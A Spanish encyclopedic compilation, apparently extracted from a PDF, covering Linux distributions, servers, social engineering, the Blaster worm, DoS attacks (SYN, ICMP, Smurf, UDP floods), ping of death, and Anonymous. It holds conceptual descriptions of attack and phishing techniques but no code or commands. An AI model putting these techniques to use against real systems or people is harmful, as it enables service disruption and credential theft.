Distribucin Linux Red Hat Enterprise Linux, derivada de Fedora, es mantenida y soportada comercialmente por Red Hat. Slackware, una de las primeras distribuciones Linux y la ms antigua en funcionamiento. Fue fundada en 1993 y desde entonces ha sido mantenida activamente por Patrick J. Volkerding. Slax, es un sistema Linux pequeo, moderno, rpido y portable orientado a la modularidad. Est basado en Slackware. Dragora y Trisquel, que van adquiriendo importancia entre las distribuciones que slo contienen software libre. Canaima, es un proyecto socio-tecnolgico abierto, construido de forma colaborativa, desarrollado en Venezuela y basado en Debian. Tuquito Basada en Ubuntu, distribucin desarrollada en argentina con buenas interfaces grficas y drivers universales. Recomendada para usuarios iniciales. El sitio web DistroWatch ofrece una lista de las distribuciones ms populares; la lista est basada principalmente en el nmero de visitas, por lo que no ofrece resultados muy confiables acerca de la popularidad de las distribuciones.

12

Distribuciones especializadas
Otras distribuciones se especializan en grupos especficos: ICABIAN, en formato Live USB est pensada para usuarios tcnicos ya que contiene una gran variedad de programas para la ciencia e ingeniera. OpenWrt, diseada para ser empotrada en dispositivos enrutadores. Edubuntu, un sistema del proyecto Ubuntu diseado para entornos educativos. Emmabunts, es diseada para facilitar el reacondicionamiento de computadores donados a comunidades Emas. LULA, distribucin acadmica para universidades. Proyecto LULA. MythTV, orientada para equipos multimedia o grabadores de vdeo digital. Musix, una distribucin de Argentina destinada a los msicos. mkLinux, Yellow Dog Linux o Black Lab Linux, orientadas a usuarios de Macintosh y de la plataforma PowerPC. 64 Studio, una distribucin basada en Debian diseada para la edicin multimedia. ABC GNU/Linux, distribucin para la construccin de clusters Beowulf desarrollado por Iker Castaos Chavarri, Universidad del Pas Vasco.

Galera

Debian GNU/Linux 6.0.2.1 Squeeze

Fedora 16 Verne

Gentoo Linux 10.0

Mandriva Linux 2010.0 Adelie

openSUSE 12.1

Slackware 13

Ubuntu 11.10 Oneiric Ocelot

Distribucin Linux

13

Sabayon Linux 7.0

Puppy Linux 4.3

SLAX 6.0.7

PCLinuxOS 2009.2

Canaima 2.0

Joventux 3.0

Dax OS 2.0

Referencias
[1] http:/ / futurist. se/ gldt/ [2] Patrick J. Volkerding. Slackware 1.0 Release Announcement (http:/ / www. slackware. com/ announce/ 1. 0. php) Slackware Linux, Inc. (en ingls)

Enlaces externos
Wikimedia Commons alberga contenido multimedia sobre Distribucin Linux. Commons www.distrowatch.com (http://www.distrowatch.com/index.php?language=ES), catlogo informativo de distribuciones. Cronologa de la historia de las distribuciones Linux (http://www.tufuncion.com/historia-distribuciones-linux)

Servidor

14

Servidor
En informtica, un servidor es un nodo que forma parte de una red, provee servicios a otros nodos denominados clientes. Tambin se suele denominar con la palabra servidor a: Una aplicacin informtica o programa que realiza algunas tareas en beneficio de otras aplicaciones llamadas clientes. Algunos servicios habituales son los servicios de archivos, que permiten a los usuarios almacenar y acceder a los archivos de una computadora y los servicios de aplicaciones, que realizan tareas en beneficio directo del usuario final. Este es el significado original del trmino. Es posible que un ordenador cumpla simultneamente las funciones de cliente y de servidor. Una computadora en la que se ejecuta un programa que realiza alguna tarea en beneficio de otras aplicaciones llamadas clientes, tanto si se trata de un ordenador central (mainframe), un miniordenador, una computadora personal, una PDA o un sistema embebido; sin embargo, hay computadoras destinadas nicamente a proveer los servicios de estos programas: estos son los servidores por antonomasia. Un servidor no es necesariamente una mquina de ltima generacin de grandes proporciones, no es necesariamente un superordenador; un servidor puede ser desde una computadora vieja, hasta una mquina sumamente potente (ej.: servidores web, bases de datos grandes, etc. Procesadores especiales y hasta varios terabytes de memoria). Todo esto depende del uso que se le d al servidor. Si usted lo desea, puede convertir al equipo desde el cual usted est leyendo esto en un servidor instalando un programa que trabaje por la red y a la que los usuarios de su red ingresen a travs de un programa de servidor web como Apache.

Ejemplo de un servidor del tipo rack.

Por lo cual podemos llegar a la conclusin de que un servidor tambin puede ser un proceso que entrega informacin o sirve a otro proceso. El modelo Cliente-servidor no necesariamente implica tener dos ordenadores, ya que un proceso cliente puede solicitar algo como una impresin a un proceso servidor en un mismo ordenador.

Tipos de servidores
En la siguiente lista hay algunos tipos comunes de servidores: es el que almacena varios tipos de archivos y los distribuye a otros clientes en la red. Servidor de impresiones: controla una o ms impresoras y acepta trabajos de impresin de otros clientes de la red, poniendo en cola los trabajos de impresin (aunque tambin puede cambiar la prioridad de las diferentes impresiones), y realizando la mayora o todas las otras funciones que en un sitio de trabajo se realizara para lograr una tarea de impresin si la impresora fuera conectada directamente con el puerto de impresora del sitio de trabajo. Servidor de correo: almacena, enva, recibe, enruta y realiza otras operaciones relacionadas con el correo electrnico para los clientes de la red. Servidor de fax: almacena, enva, recibe, enruta y realiza otras funciones necesarias para la transmisin, la recepcin y la distribucin apropiadas de los fax. Servidor de la telefona: realiza funciones relacionadas con la telefona, como es la de contestador automtico, realizando las funciones de un sistema interactivo para la respuesta de la voz, almacenando los mensajes de voz, encaminando las llamadas y controlando tambin la red o el Internet, p. ej., la entrada excesiva de la voz sobre IP (VoIP), etc.

Servidor Servidor proxy: realiza un cierto tipo de funciones a nombre de otros clientes en la red para aumentar el funcionamiento de ciertas operaciones (p. ej., prefetching y depositar documentos u otros datos que se soliciten muy frecuentemente), tambin proporciona servicios de seguridad, o sea, incluye un cortafuegos. Permite administrar el acceso a internet en una red de computadoras permitiendo o negando el acceso a diferentes sitios Web. Servidor del acceso remoto (RAS): controla las lneas de mdem de los monitores u otros canales de comunicacin de la red para que las peticiones conecten con la red de una posicin remota, responde llamadas telefnicas entrantes o reconoce la peticin de la red y realiza la autentificacin necesaria y otros procedimientos necesarios para registrar a un usuario en la red. Servidor de uso: realiza la parte lgica de la informtica o del negocio de un uso del cliente, aceptando las instrucciones para que se realicen las operaciones de un sitio de trabajo y sirviendo los resultados a su vez al sitio de trabajo, mientras que el sitio de trabajo realiza la interfaz operadora o la porcin del GUI del proceso (es decir, la lgica de la presentacin) que se requiere para trabajar correctamente. Servidor web: almacena documentos HTML, imgenes, archivos de texto, escrituras, y dems material Web compuesto por datos (conocidos colectivamente como contenido), y distribuye este contenido a clientes que la piden en la red. Servidor de base de datos: provee servicios de base de datos a otros programas u otras computadoras, como es definido por el modelo cliente-servidor. Tambin puede hacer referencia a aquellas computadoras (servidores) dedicadas a ejecutar esos programas, prestando el servicio. Servidor de reserva: tiene el software de reserva de la red instalado y tiene cantidades grandes de almacenamiento de la red en discos duros u otras formas del almacenamiento (cinta, etc.) disponibles para que se utilice con el fin de asegurarse de que la prdida de un servidor principal no afecte a la red. Esta tcnica tambin es denominada clustering. Servidor de Seguridad: Tiene software especializado para detener intrusiones maliciosas, normalmente tienen antivirus, antispyware, antimalware, adems de contar con cortafuegos redundantes de diversos niveles y/o capas para evitar ataques, los servidores de seguridad varan dependiendo de su utilizacin e importancia. Sin embargo, de acuerdo al rol que asumen dentro de una red se dividen en: Servidor dedicado: son aquellos que le dedican toda su potencia a administrar los recursos de la red, es decir, a atender las solicitudes de procesamiento de los clientes. Servidor no dedicado: son aquellos que no dedican toda su potencia a los clientes, sino tambin pueden jugar el rol de estaciones de trabajo al procesar solicitudes de un usuario local.

15

Referencias

Ingeniera social (seguridad informtica)

16

Ingeniera social (seguridad informtica)


Para ver un trmino similar en una disciplina diferente vea Ingeniera social (ciencias polticas). En el campo de la seguridad informtica, ingeniera social es la prctica de obtener informacin confidencial a travs de la manipulacin de usuarios legtimos. Es una tcnica que pueden usar ciertas personas, tales como investigadores privados, criminales, o delincuentes informticos, para obtener informacin, acceso o privilegios en sistemas de informacin que les permitan realizar algn acto que perjudique o exponga la persona u organismo comprometido a riesgo o abusos. El principio que sustenta la ingeniera social es el que en cualquier sistema "los usuarios son el eslabn dbil". En la prctica, un ingeniero social usar comnmente el telfono o Internet para engaar a la gente, fingiendo ser, por ejemplo, un empleado de algn banco o alguna otra empresa, un compaero de trabajo, un tcnico o un cliente. Va Internet o la web se usa, adicionalmente, el envo de solicitudes de renovacin de permisos de acceso a pginas web o memos falsos que solicitan respuestas e incluso las famosas cadenas, llevando as a revelar informacin sensible, o a violar las polticas de seguridad tpicas. Con este mtodo, los ingenieros sociales aprovechan la tendencia natural de la gente a reaccionar de manera predecible en ciertas situaciones, -por ejemplo proporcionando detalles financieros a un aparente funcionario de un banco- en lugar de tener que encontrar agujeros de seguridad en los sistemas informticos. Quiz el ataque ms simple pero muy efectivo sea engaar a un usuario llevndolo a pensar que un administrador del sistema esta solicitando una contrasea para varios propsitos legtimos. Los usuarios de sistemas de Internet frecuentemente reciben mensajes que solicitan contraseas o informacin de tarjeta de crdito, con el motivo de "crear una cuenta", "reactivar una configuracin", u otra operacin benigna; a este tipo de ataques se los llama phishing (se pronuncia igual que "fishing", pesca). Los usuarios de estos sistemas deberan ser advertidos temprana y frecuentemente para que no divulguen contraseas u otra informacin sensible a personas que dicen ser administradores. En realidad, los administradores de sistemas informticos raramente (o nunca) necesitan saber la contrasea de los usuarios para llevar a cabo sus tareas. Sin embargo incluso este tipo de ataque podra no ser necesario en una encuesta realizada por la empresa Boixnet, el 90% de los empleados de oficina de la estacin Waterloo de Londres revel sus contraseas a cambio de un bolgrafo barato. Otro ejemplo contemporneo de un ataque de ingeniera social es el uso de archivos adjuntos en e-mails, ofreciendo, por ejemplo, fotos "ntimas" de alguna persona famosa o algn programa "gratis" (a menudo aparentemente provenientes de alguna persona conocida) pero que ejecutan cdigo malicioso (por ejemplo, usar la mquina de la vctima para enviar cantidades masivas de spam). Ahora, despus de que los primeros e-mails maliciosos llevaran a los proveedores de software a deshabilitar la ejecucin automtica de archivos adjuntos, los usuarios deben activar esos archivos de forma explcita para que ocurra una accin maliciosa. Muchos usuarios, sin embargo, abren casi ciegamente cualquier archivo adjunto recibido, concretando de esta forma el ataque. La ingeniera social tambin se aplica al acto de manipulacin cara a cara para obtener acceso a los sistemas informticos. Otro ejemplo es el conocimiento sobre la vctima, a travs de la introduccin de contraseas habituales, lgicas tpicas o conociendo su pasado y presente; respondiendo a la pregunta: Qu contrasea introducira yo si fuese la vctima? La principal defensa contra la ingeniera social es educar y entrenar a los usuarios en el uso de polticas de seguridad y asegurarse de que estas sean seguidas. Uno de los ingenieros sociales ms famosos de los ltimos tiempos es Kevin Mitnick. Segn su opinin, la ingeniera social se basa en estos cuatro principios: 1. Todos queremos ayudar. 2. El primer movimiento es siempre de confianza hacia el otro. 3. No nos gusta decir No.

Ingeniera social (seguridad informtica) 4. A todos nos gusta que nos alaben.

17

Referencias
John Leyden, 18 de abril de 2003. Office workers give away passwords for a cheap pen [1] (Oficinistas revelan contraseas) (en ingls). The Register [2]. Kevin D. Mitnick, William L. Simon, Steve Wozniak. The Art of Deception: Controlling the Human Element of Security. John Wiley & Sons, 2002. ISBN 0-471-23712-4. SirRoss, 19 de enero de 2005. A Guide to Social Engineering, Volume 1 [3] A Guide to Social Engineering, Volume 2 [4]. AstaLavista.

Enlaces externos
Social Engineering Fundamentals [5] Informacin sobre ingeniera social y fraude de la Oficina de Seguridad del Internauta [6] Informe sobre como recopilar informacin de seguridad [7] Human Security - Blog de Ingeniera Social en castellano [8]

Referencias
[1] [2] [3] [4] [5] [6] [7] http:/ / www. theregister. co. uk/ 2003/ 04/ 18/ office_workers_give_away_passwords/ http:/ / www. theregister. co. uk/ http:/ / www. astalavista. com/ index. php?section=directory& linkid=3410 http:/ / www. astalavista. com/ index. php?section=directory& linkid=3488 http:/ / www. securityfocus. com/ infocus/ 1527 http:/ / www. osi. es/ es/ conoce-los-riesgos/ fraude-ingenieria-social http:/ / cert. inteco. es/ cert/ Notas_Actualidad/ intecocert_csirtcv_generalitat_valenciana_publican_informe_pentest_recoleccion_informacion_information_gathering_20111111 [8] http:/ / humansec. wordpress. com

Blaster

18

Blaster
Blaster, (o tambin llamado Lovsan o LoveSan 3a1) es un gusano de red de Windows que se aprovecha de una vulnerabilidad en el servicio DCOM para infectar a otros sistemas de forma automtica. El gusano fue detectado y liberado el da 11 de agosto de 2003. La tasa de infecciones aument considerablemente hasta el da 13 de agosto de 2003. Gracias al filtrado por las ISP's y la gran publicidad frente este gusano, la infeccin pudo frenarse. El 29 de agosto de 2003, Jeffrey Lee Parson, de 18 aos de Hopkins, Minnesota fue arrestado por crear la variante B del gusano Blaster; admiti ser el responsable y fue sentenciado a 18 meses en prisin en enero de 2005.

Efectos principales
El mtodo con el que infecta los sistemas vulnerables es bastante parecido a la que us el gusano Sasser, aparte, deja una puerta trasera que permite la intrusin a terceros, haciendo que la mquina infectada sea fcilmente atacada por otros virus, o accesos remotos no autorizados. El gusano se disemina al explotar un desbordamiento de buffer en el servicio DCOM para los sistemas operativos Windows afectados, para los cuales se liber un parche un mes antes en MS03-026 [1] y luego en MS03-039 [2]. Est programado para realizar un ataque organizado de denegacin de servicio al puerto 80 de "windowsupdate.com". sin embargo, los daos fueron mnimos debido a que el sitio era redirigido a "windowsupdate.microsoft.com". Aparte, Microsoft apag sus servidores para minimizar los efectos. El gusano tiene en su cdigo los siguientes mensajes: I just want to say LOVE YOU SAN!!) es por eso que a veces es llamado el gusano LoveSan o LovSan. El segundo: billy gates why do you make this possible ? Stop making money and fix your software!! (Billy Gates, Porqu haces esto posible? Deja de hacer dinero y corrige tu software!!) Es un mensaje a Bill Gates, el fundador de Microsoft, y el objetivo del gusano.

Efectos secundarios
En algunas versiones de Windows, puede generar inestabilidad del sistema, e incluso una ventana que advierte al usuario de que se debe reiniciar el ordenador: Apagando el sistema: Se est apagando el sistema. Guarde todo trabajo en progreso y cierre la sesin. Cualquier cambio sin guardar se perder. El apagado fue ordenado por NT AUTHORITY\SYSTEM tiempo Restante: hh:mm:ss Mensaje: Windows debe reiniciar ahora porque Remote Procedure Call (RPC) Service Termin inesperadamente.

Blaster

19

Referencias
Detalles del virus Blaster en INTECO-CERT. [3] MS03-026 [1] Parche que cerraba el agujero de seguridad que aprovecha Blaster. MS03-039 [2] Otro parche, publicado luego del ataque de Blaster.

Referencias
[1] http:/ / www. microsoft. com/ technet/ security/ bulletin/ MS03-026. mspx [2] http:/ / www. microsoft. com/ technet/ security/ bulletin/ MS03-039. mspx [3] http:/ / cert. inteco. es/ virusDetail/ Actualidad/ Actualidad_Virus/ Detalle_Virus/ Blaster

Ataque de denegacin de servicio


En seguridad informtica, un Ataque de denegacin de servicios, tambin llamado ataque DoS (de las siglas en ingls Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legtimos. Normalmente provoca la prdida de la conectividad de la red por el consumo del ancho de banda de la red de la vctima o sobrecarga de los recursos computacionales del sistema de la vctima. Un ejemplo notable de este tipo de ataque se produjo el 27 de marzo de 2013, cuando un ataque de una empresa a otra inund la red de spam provocando una ralentizacin generalizada de Internet e incluso lleg a afectar a puntos clave como el nodo central de Londres.[1] Se genera mediante la saturacin de los puertos con flujo de informacin, haciendo que el servidor se sobrecargue y no pueda seguir prestando servicios; por eso se le denomina "denegacin", pues hace que el servidor no d abasto a la cantidad de solicitudes. Esta tcnica es usada por los llamados crackers para dejar fuera de servicio a servidores objetivo.

Una ampliacin del ataque DoS es el llamado ataque distribuido de denegacin de servicio, tambin llamado ataque DDoS (de las siglas en ingls Distributed Denial of Service) el cual se lleva a cabo generando un gran flujo de informacin desde varios puntos de conexin. La forma ms comn de realizar un DDoS es a travs de una botnet, siendo esta tcnica el ciberataque ms usual y eficaz por su sencillez tecnolgica. En ocasiones, esta herramienta ha sido utilizada como un buen mtodo para comprobar la capacidad de trfico que un ordenador puede soportar sin volverse inestable y afectar a los servicios que presta. Un administrador de redes puede as conocer la capacidad real de cada mquina.

Diagrama de un ataque DDoS usando el software Stacheldraht

Ataque de denegacin de servicio

20

Mtodos de ataque
Un ataque de "Denegacin de servicio" impide el uso legtimo de los usuarios al usar un servicio de red. El ataque se puede dar de muchas formas. Pero todas tienen algo en comn: utilizan la familia de protocolos TCP/IP para conseguir su propsito. Un ataque DoS puede ser perpetrado de varias formas. Aunque bsicamente consisten en : Consumo de recursos computacionales, tales como ancho de banda, espacio de disco, o tiempo de procesador. Alteracin de informacin de configuracin, tales como informacin de rutas de encaminamiento. Alteracin de informacin de estado, tales como interrupcin de sesiones TCP (TCP reset). Interrupcin de componentes fsicos de red. Obstruccin de medios de comunicacin entre usuarios de un servicio y la vctima, de manera que ya no puedan comunicarse adecuadamente.

Inundacin SYN (SYN Flood)


Principios de TCP/IP Cuando una mquina se comunica mediante TCP/IP con otra, enva una serie de datos junto a la peticin real. Estos datos forman la cabecera de la solicitud. Dentro de la cabecera se encuentran unas sealizaciones llamadas Flags (banderas). Estas sealizaciones (banderas) permiten iniciar una conexin, cerrarla, indicar que una solicitud es urgente, reiniciar una conexin, etc. Las banderas se incluyen tanto en la solicitud (cliente), como en la respuesta (servidor). Para aclararlo, veamos cmo es un intercambio estndar TCP/IP: 1 Establecer Conexin: El cliente enva una Flag SYN; si el servidor acepta la conexin, ste debera responderle con un SYN/ACK; luego el cliente debera responder con una Flag ACK. 1-Cliente --------SYN-----> 4-Cliente <-----SYN/ACK---5-Cliente --------ACK-----> 2 Servidor 3 Servidor 6 Servidor

2 Resetear Conexin: Al haber algn error o perdida de paquetes de envo se establece envo de Flags RST: 1-Cliente -------Reset-----> 2-servidor 4-Cliente <----Reset/ACK---- 3-Servidor 5-Cliente --------ACK------> 6-Servidor La inundacin SYN enva un flujo de paquetes TCP/SYN (varias peticiones con Flags SYN en la cabecera), muchas veces con la direccin de origen falsificada. Cada uno de los paquetes recibidos es tratado por el destino como una peticin de conexin, causando que el servidor intente establecer una conexin al responder con un paquete TCP/SYN-ACK y esperando el paquete de respuesta TCP/ACK (Parte del proceso de establecimiento de conexin TCP de 3 vas). Sin embargo, debido a que la direccin de origen es falsa o la direccin IP real no ha solicitado la conexin, nunca llega la respuesta. Estos intentos de conexin consumen recursos en el servidor y copan el nmero de conexiones que se pueden establecer, reduciendo la disponibilidad del servidor para responder peticiones legtimas de conexin. SYN cookies provee un mecanismo de proteccin contra Inundacin SYN, eliminando la reserva de recursos en el host destino, para una conexin en momento de su gestin inicial.

Ataque de denegacin de servicio

21

Inundacin ICMP (ICMP Flood)


Es una tcnica DoS que pretende agotar el ancho de banda de la vctima. Consiste en enviar de forma continuada un nmero elevado de paquetes ICMP Echo request (ping) de tamao considerable a la vctima, de forma que esta ha de responder con paquetes ICMP Echo reply (pong) lo que supone una sobrecarga tanto en la red como en el sistema de la vctima. Dependiendo de la relacin entre capacidad de procesamiento de la vctima y el atacante, el grado de sobrecarga vara, es decir, si un atacante tiene una capacidad mucho mayor, la vctima no puede manejar el trfico generado.

SMURF
Existe una variante a ICMP Flood denominado Ataque Smurf que amplifica considerablemente los efectos de un ataque ICMP. Existen tres partes en un Ataque Smurf: El atacante, el intermediario y la vctima (comprobaremos que el intermediario tambin puede ser vctima). En el ataque Smurf, el atacante dirige paquetes ICMP tipo "echo request" (ping) a una direccin IP de broadcast, usando como direccin IP origen, la direccin de la vctima (Spoofing). Se espera que los equipos conectados respondan a la peticin, usando Echo reply, a la mquina origen (vctima). Se dice que el efecto es amplificado, debido a que la cantidad de respuestas obtenidas, corresponde a la cantidad de equipos en la red que puedan responder. Todas estas respuestas son dirigidas a la vctima intentando colapsar sus recursos de red. Como se dijo anteriormente, los intermediarios tambin sufren los mismos problemas que las propias vctimas.

Inundacin UDP (UDP Flood)


Bsicamente este ataque consiste en generar grandes cantidades de paquetes UDP contra la vctima elegida. Debido a la naturaleza sin conexin del protocolo UDP, este tipo de ataques suele venir acompaado de IP spoofing. Es usual dirigir este ataque contra mquinas que ejecutan el servicio Echo, de forma que se generan mensajes Echo de un elevado tamao.

Referencias
[1] Una disputa entre empresas ralentiza Internet (http:/ / tecnologia. elpais. com/ tecnologia/ 2013/ 03/ 27/ actualidad/ 1364405367_942632. html) por Rosa Jimnez Cano y publicado en El Pas el 27 de marzo de 2013. Comprobado el 27 de marzo de 2013.

Enlaces externos
Syn Flood, que es y como mitigarlo (http://foro.hackhispano.com/showthread.php?t=36604) Intentando detener un DDoS (http://foro.elhacker.net/tutoriales_documentacion/ intentando_detener_un_ddos-t137442.0.html)

Ping de la muerte

22

Ping de la muerte
Un ping de la muerte es un tipo de ataque enviado a una computadora que consiste en mandar numerosos paquetes ICMP muy grandes (mayores a 65.535 bytes) con el fin de colapsar el sistema atacado. Los atacantes comenzaron a aprovecharse de esta vulnerabilidad en los sistemas operativos en 1996, vulnerabilidad que en 1997 sera corregida por lo que este tipo de ataque no tiene efecto sobre los sistemas operativos actuales. Es un tipo de ataque a computadoras que implica enviar un ping deformado a una computadora. Un ping normalmente tiene un tamao de 64 bytes; algunos sistemas operativos no podan manejar pings mayores al mximo de un paquete IP comn, que es de 65.535 bytes. Enviando pings de este tamao era posible hacer que esas computadoras dejaran de funcionar. Este fallo fue fcil de usar. Si bien, enviar un paquete de "Ping de la Muerte" de un tamao de 65.536 bytes es invlido segn los protocolos de establecimiento de una red, se puede enviar un paquete de tal tamao si se hacen fragmentos del mismo. As, cuando la computadora que es el blanco de ataque vuelve a montar el paquete, puede ocurrir una saturacin del buffer, lo que a menudo produce como consecuencia un fallo del sistema. Este exploit ha afectado a la mayora de Sistemas Operativos, como Unix, Linux, Mac, Windows, a impresoras, y a los routers. No obstante la mayora de los sistemas operativos desde 1997-1998 han arreglado este problema, por lo que el fallo est solucionado. En la actualidad otro tipo de ataques con ping han llegado a ser muy utilizados, como por ejemplo el "Ping Flooding".

Enlaces externos
Ping of death segn insecure.org [1]

Referencias
[1] http:/ / www. insecure. org/ sploits/ ping-o-death. html

Anonymous

23

Anonymous
Anonymous

Una de las banderas del movimiento. El hombre sin cabeza y traje formal representa la ausencia de lderes o dirigentes. Lema We are Anonymous. We are Legion. We do not forgive. We do not forget. [][] Expect us! Fenmeno de Internet Comunidad virtual Asociacin voluntaria Ciberactivismo Controversia en Internet Entretenimiento 2003 - 2004 Global Descentralizados Grupo de afinidad [1] Red Social: http:/ / anonplus. com/ Algunas operaciones importantes pueden verse en: [2] http:/ / anonops. blogspot. com/

Tipo

Objetivos

Fundacin mbito Miembros

Sitio web

Anonymous [nnms] (Annimo o Annimos en castellano) es un seudnimo utilizado mundialmente por diferentes grupos e individuos para ponindose o no de acuerdo con otros realizar en su nombre acciones o publicaciones individuales o concertadas. Surgidos del imageboard 4chan, en un comienzo como un movimiento por diversin, desde el 2008 Anonymous se manifiesta en acciones de protesta a favor de la libertad de expresin, de la independencia de Internet y en contra de diversas organizaciones, entre ellas, Scientology, servicios pblicos, consorcios con presencia global y sociedades de derechos de autor. En sus inicios, los participantes actuaban solamente en Internet, pero entretanto desarrollan sus actividades tambin fuera de la red. Entre otros medios de accin de Anonymous, se cuentan las manifestaciones en las calles y los ataques de hackers. Puesto que no existe una jerarqua al menos ninguna evidente o reconocible resulta en general difcil confirmar la autenticidad de las noticias o informaciones referentes a Anonymous. Asimismo, debido al anonimato, sucede que un nico individuo puede producir noticias falsas e introducirlas como supuestamente autnticas de Anonymous. En el sentido lato, Anonymous se considera como un trmino para ciertas subculturas de Internet. No son patriotas por lo que su bandera representa algo neutral. [3][]

Anonymous

24

Formas de accin y coordinacin


Las acciones atribuidas a Anonymous son llevadas a cabo por individuos no identificados que se autodenominan Anonymous.[] Despus de una serie de polmicas, protestas y ataques DDoS en 2008, los incidentes vinculados a sus miembros son cada vez ms comunes.[] Anonymous se organiza de manera difusa en la red, lo que dificulta encontrar algo oficial relacionado con Anonymous. Sin embargo, esta comunidad de personas organiza operaciones, debate del estado de los pases y dems asuntos valndose de distintos canales online. Aunque no estn vinculados a una nica entidad online, muchas webs estuvieron en sus inicios fuertemente ligadas a Anonymous. Esto incluye notables tablones de imgenes como 4chan y Futaba Channel, algunas wikis asociadas a estos tablones como Encyclopdia Dramatica y una serie de foros de diversas temticas.[4] Ms tarde se implementaron Wikis diversas y Chats (canales IRC) con el objetivo de ganar mayor presencia en el espacio Internet. A travs de estas plataformas se han organizado protestas como el Project Chanology.[5][6] Las redes sociales, como Facebook y similares, desempean un papel ms bien secundario en la estructura, pero suelen utulizarse para la formacin de pequeos grupos o clulas y su coordinacin para la movilizacin a la calle en las protestas reales.[7] Anonymous no tiene lderes, ni tampoco instancias controladoras. Se basa en la fuerza colectiva de sus participantes individuales y en la ventaja de que la informacin puede ser difundida rpidamente a travs de internet.[8] Aunque algunos sitios web como eBaum's World estipulan que solamente los adultos mayores de 18 aos deberan ver los contenidos, no hay ninguna posibilidad segura de bloquear el acceso a los ms jvenes, por lo que algunos anona son menores de edad. Debido a que no existe una direccin, ni tampoco membresa en sentido administrativo y la colaboracin es completamente sin compromiso, su estructura puede compararse a la de un movimiento juvenil anarquista.[9] As, al menos de acuerdo a lo que se conoce hasta ahora, no cuenta con una estructura orgnica central o una jerarqua que sea de algn modo vinculante para todos los miembros del colectivo. Es decir, en el caso de Anonymous no se trata de una organizacin en el sentido comn del trmino, sino ms bien de un colectivo o un movimiento.

Orgenes como concepto y fenmeno de Internet


El nombre de Anonymous en s mismo est inspirado en el anonimato que perciben los usuarios cuando publican comentarios e imgenes en Internet. El uso del trmino, en el sentido de una identidad compartida, empez en los tablones de imgenes (en ingls: imageboards) donde se le asigna la etiqueta de "annimo" a los visitantes que dejan comentarios sin identificarse. Algunas veces los usuarios de los tablones de imgenes bromean actuando como si Anonymous fuera una persona real incluso aludiendo a ella como "Anon".[10]

A la vez que la popularidad de los tablones de imgenes aumentaba, la idea de Anonymous como un colectivo de individuos sin nombre se convirti en un meme o fenmeno de Internet.[]

Miembros de Anonymous con mscaras de Guy Fawkes, utilizada por el personaje V (Vi, Ve o Uve, dependiendo el pas) de la novela grfica y pelcula V de Vendetta, de Alan Moore, en Los ngeles, 10 de febrero de 2008.

Las definiciones de Anonymous tienden a enfatizar el hecho de que el trmino no puede ser fcilmente comprendido por una descripcin simple, y en su lugar se explica a menudo por aforismos que describen cualidades percibidas.

Anonymous Anonymous es la primera super-conciencia basada en Internet. Anonymous es un grupo, en el sentido de que una bandada de aves es un grupo. Por qu sabes que son un grupo? Porque viajan en la misma direccin. En un momento dado, ms aves podran unirse, irse o cambiar completamente de rumbo. Landers, Chris, Baltimore City Paper, 2 de abril de 2008[11]

25

El lema
El lema de Anonymous es:

Knowledge is free. We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us!

El conocimiento es libre. Somos Annimos. Somos Legin. No perdonamos. No olvidamos. Esperadnos! [] "Message to Scientology" [] "Call to Action"

Bloqueo en redes sociales


El 9 de diciembre de 2010 Twitter cancel la cuenta de Anonymous y despus Facebook elimin la pgina de Operation Payback (Operacin venganza) en lo que ya se considera por parte de miembros de Anonymous como una guerra digital para proteger la libertad de informacin.[12] En abril de 2011 el portal de vdeos YouTube comenz a borrar vdeos subidos por cuentas de Anonymous.[13][14]

Detenciones
Arrestos en Espaa
El 10 de junio de 2011 el Cuerpo Nacional de Polica en Espaa detuvo y posteriormente liber a tres personas acusadas de asociacin ilcita y de vulnerar el artculo 264.2 del Cdigo Penal[15][16] por ser supuestamente los administradores de chats desde los que se realizaron ataques a pginas web. La Polica Nacional y numerosos medios de comunicacin anunciaron haber desmantelado la 'cpula' de Anonymous, equiparando el trmino a los de organizaciones terroristas a pesar de tratarse de una organizacin descentralizada y no jerrquica.[17][18] En protesta y respuesta a estas detenciones y acusaciones, la pgina web de la Polica Nacional espaola [19] recibi un ataque DDoS a las 23:30 horas del sbado 11 de junio de 2011.[][20] La operacin transcurri bajo el hashtag en Twitter #OpPolicia.[] Agentes de la polica Espaola detendran a 4 miembros de anonymous, presuntos responsables de ataques DDoS. Los investigadores los identificaron y los detuvieron por diferentes puntos de Espaa; primero en:Malga, Sur espaola con el seudnimo "Thunder" o "pacotron"(F.J.B.D, iniciales de su nombre) presuntamente la cabezera informtica utilizada en Anonymous Espaa e iberoamricanas. Ms tarde a "Troy"(J.M.L.G) en Madrid, presunto autor de material de ataques ms destacados y filtraciones reivindicadas por anonymous Espaa. Se suma adems el arresto de "J.I.P.S" colega en actividades de "Troy", y la aprisin de un joven de 16 aos, presunto integrante de un grupo internacional de hacking conocido como sector 404 relacionado con ataques de Anonymous; estos miembros mencionados anteriormente disponan de un chat privado preciso de un certificado propio del administrador.[21]

Anonymous

26

Arrestos en Chile
6 presuntos integrantes de Anonymous fueron localizados y arrestados por la Polica de Investigaciones de Chile (PDI), ya que se relacionaban con los ataques del grupo de hackers activistas. La PDI declaro: "En cooordinacin con Interpol, partimos de la operacin Exposure realizando varias diligencias policiacas desarticulando al grupo Anonymous Chile". El grupo detenido fue puesto a disposicin por la PDI nombrados "presuntos responsables de ataques DDoS en pginas web de partidos polticos, instituciones y empresas", con edades de 17 aos 2 de ellos y la otra parte entre 20 y 35 aos de edad viviendo en varas partes del estado y precisando la PDI que son parte del grupo Anonymous.El fiscal de la unidad de Delitos de Alta Complejidad, Marco Mercado exclamo que la condena a estos actos va entre 5 aos y 541 das en la crcel. En la detencin se obtuvieron Discos duros externos, computadoras y otras unidades de almacenamiento las cuales estn siendo investigadas por detectives de la brigada Ciber-Crimen en la institucin de la polica Chilena. Varios de estos arrestos son hechos por la operacin internacional Exposure contra ciberdelitos coordinada por la Interpol con 25 arrestos en Espaa, agregando en arrestos a 10 personas ms en Argentina y 5 en Colombia y todos son parte del grupo Anonymous[22]

Referencias
Flix Stalder, "Anonymous, la protesta enmascarada [23]". Le Monde Diplomatique, febrero de 2012
